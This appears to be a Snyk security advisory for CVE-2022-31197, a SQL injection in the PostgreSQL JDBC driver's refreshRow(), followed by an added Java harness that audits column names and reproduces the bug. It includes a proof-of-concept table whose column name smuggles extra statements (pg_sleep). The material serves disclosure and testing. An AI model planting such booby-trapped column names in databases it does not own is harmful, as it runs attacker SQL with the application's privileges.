SQL Injection Affecting org.postgresql:postgresql package, versions [,42.2.26) [42.3.0,42.3.7) [42.4.0,42.4.1)
- Snyk ID SNYK-JAVA-ORGPOSTGRESQL-2970521
- published 4 Aug 2022
- disclosed 4 Aug 2022
- credit kato sho
Introduced: 4 Aug 2022
- CVE-2022-31197
How to fix?
Upgrade org.postgresql:postgresql to the patched release of the branch you are on: 42.2.26 (42.2.x), 42.3.7 (42.3.x) or 42.4.1 (42.4.x), or any later version.
Overview
org.postgresql:postgresql is the PostgreSQL JDBC driver (JDBC 4.2, JRE 8+).
Affected versions of this package are vulnerable to SQL Injection via java.sql.ResultSet.refreshRow(), implemented in jdbc/PgResultSet.java. To refresh the current row, the driver builds a fresh SELECT statement by concatenating the result set's column names into the query text without escaping them as identifiers. An attacker with control of the underlying database (in particular, one who can create or rename columns) can name a column with a string containing a semicolon or other statement terminator, convince the application to run a query against the table with the compromised column, and then have the application call ResultSet.refreshRow() on that result set. The text embedded in the column name is then executed as additional SQL statements over the application's own connection, with the privileges of the application's database user.
NOTE:
- An application that connects only to its own database, with a fixed schema that no untrusted party has DDL permissions to alter, is not affected by this vulnerability.
- Applications that never invoke ResultSet.refreshRow() are not affected.
PoC (a table whose second column name carries the injected statements; any query against it followed by refreshRow() makes a vulnerable driver run pg_sleep(10)):
CREATE TABLE refresh_row_example (
    id int PRIMARY KEY,
    "1 FROM refresh_row_example; SELECT pg_sleep(10); SELECT * " int
);
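The advisory's PoC stops at the table definition; the trigger itself happens on the Java side. The following harness is an added example (not code from the Snyk advisory or from the pgjdbc project) that does two things a practitioner would want: it audits information_schema for column names containing statement terminators or quote characters, which is how a "fixed schema" assumption can be verified, and it reproduces the PoC by timing ResultSet.refreshRow() against the refresh_row_example table above. A delay of ten seconds or more means the injected pg_sleep(10) ran and the driver on the classpath is vulnerable. The JDBC URL, user and password are placeholders (assumed), and the table is assumed to have been created with the PoC SQL.

```java
// Added example: audit column names and reproduce CVE-2022-31197 via refreshRow().
// Not from the advisory or pgjdbc. Connection details below are placeholders (assumption);
// the table refresh_row_example is the one created by the advisory's PoC SQL.
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

public class RefreshRowCheck {

    // Column names holding ';', quotes, or comment markers are the raw material for this
    // bug: a vulnerable driver pastes them unquoted into the SELECT it builds in refreshRow().
    // Catalog tables are excluded; anything else that matches deserves a look.
    private static final String AUDIT_SQL =
        "SELECT table_schema, table_name, column_name "
      + "FROM information_schema.columns "
      + "WHERE table_schema NOT IN ('pg_catalog', 'information_schema') "
      + "AND column_name ~ '[;\"'']|--|/\\*'";

    // Returns schema.table.column for every column whose name matches AUDIT_SQL.
    static List<String> auditColumnNames(Connection conn) throws SQLException {
        List<String> hits = new ArrayList<>();
        try (Statement st = conn.createStatement();
             ResultSet rs = st.executeQuery(AUDIT_SQL)) {
            while (rs.next()) {
                hits.add(rs.getString(1) + "." + rs.getString(2) + "." + rs.getString(3));
            }
        }
        return hits;
    }

    // Reproduces the advisory's PoC: refreshRow() needs an updatable, scrollable result set
    // over a single table with a primary key, which refresh_row_example provides.
    // Returns the wall-clock time refreshRow() took, in milliseconds.
    static long timeRefreshRowMillis(Connection conn) throws SQLException {
        try (Statement st = conn.createStatement(
                 ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_UPDATABLE);
             ResultSet rs = st.executeQuery("SELECT * FROM refresh_row_example")) {
            if (!rs.next()) {
                throw new IllegalStateException("refresh_row_example is empty; insert a row first");
            }
            long start = System.nanoTime();
            try {
                rs.refreshRow();
            } catch (SQLException e) {
                // A vulnerable driver may still throw after the injected statements have run,
                // since the rewritten query no longer returns what refreshRow() expects.
                // The delay is the signal, so report the exception and keep the timing.
                System.out.println("refreshRow() threw: " + e.getMessage());
            }
            return (System.nanoTime() - start) / 1_000_000;
        }
    }

    public static void main(String[] args) throws SQLException {
        // Placeholder connection details (assumption): point these at a throwaway database.
        String url = "jdbc:postgresql://localhost:5432/testdb";
        try (Connection conn = DriverManager.getConnection(url, "testuser", "testpass")) {
            List<String> suspicious = auditColumnNames(conn);
            System.out.println("Columns with terminators/quotes in their names: " + suspicious);

            // refreshRow() needs a current row; only the id column is named, so the
            // booby-trapped column never has to be spelled out in our own SQL.
            try (Statement st = conn.createStatement()) {
                st.executeUpdate(
                    "INSERT INTO refresh_row_example (id) VALUES (1) ON CONFLICT DO NOTHING");
            }

            long ms = timeRefreshRowMillis(conn);
            System.out.println("refreshRow() took " + ms + " ms");
            System.out.println(ms >= 10_000
                ? "pg_sleep(10) ran: driver is VULNERABLE (upgrade to 42.2.26 / 42.3.7 / 42.4.1+)"
                : "no delay: driver quotes column names in refreshRow() (fixed)");
        }
    }
}
```

Run it once with the vulnerable driver and once with the patched one on the classpath; only the former should show the ten-second delay. The audit query is worth keeping in a scheduled job even after upgrading, because a column name that contains a statement terminator has no legitimate reason to exist in a schema the application is supposed to own.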